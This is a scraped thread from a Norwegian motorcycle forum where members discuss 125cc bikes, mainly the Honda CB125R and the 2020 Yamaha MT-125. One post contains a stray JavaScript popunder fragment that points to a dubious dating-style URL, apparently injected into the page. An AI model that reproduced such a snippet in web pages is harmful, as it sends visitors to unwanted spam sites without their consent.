Honda CB125R
- Bjerknez
- Innlegg: 23254
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Honda CB125R
Det viste jeg faktisk ikke mekkern. Takk for opplysningen. Har alltid trodd det at det fantest 4 sylindrede 125ccm. Jaja, der fikk jeg på pukkelen, det skal jeg hjertens innrømme :)
-
- Innlegg: 7648
- Registrert: 06 nov 2008, 22:42
- Motorsykkelen din: flere -til div kjøring.
- Sted: Tranby
Re: Honda CB125R
tenker det var en "glipp" i forhold til din mening om større motorer..
men greide selvfølgelig ikke dy meg..
当有疑问时踢你的敌人在生殖器上,你可以道歉后
- Bjerknez
- Innlegg: 23254
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Honda CB125R
Re: Honda CB125R
Ja, har sett en del på den og det endte opp med at jeg faktisk kjøpte MT 2020 modellen. Får den i januarkjellv skrev: ↑11 des 2019, 18:49 2020_yam_mt125_eu_dpbmc_stu_001_03-71694.jpg
Har du sett på 2020 Yamaha MT-125? Denne har fått samme motor som YZF-R125. Denne motoren har variable kammer som endrer åpning av ventiler ved 5700 rpm, og gjør at den har mer Power både på lave og i høye turtall en tidligere motorer. Se på filmen under, bruker ikke lang tid fra 0-140 denne. I tillegg til dette er jo nye MT-125 blitt enda mye tøffere enn første generasjon. Fronten ligner mer på MT-09, 140/70R17 bakdekk, baksetet er bedre , og for første gang faktisk noe du kan tilby en passasjer å sitte på uten å ha vondt i baken i lang tid etterpå
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
-
OnlineAJ
- Administrator
- Innlegg: 38121
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Honda CB125R
Veldig bra!
Gratulerer så mye !
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering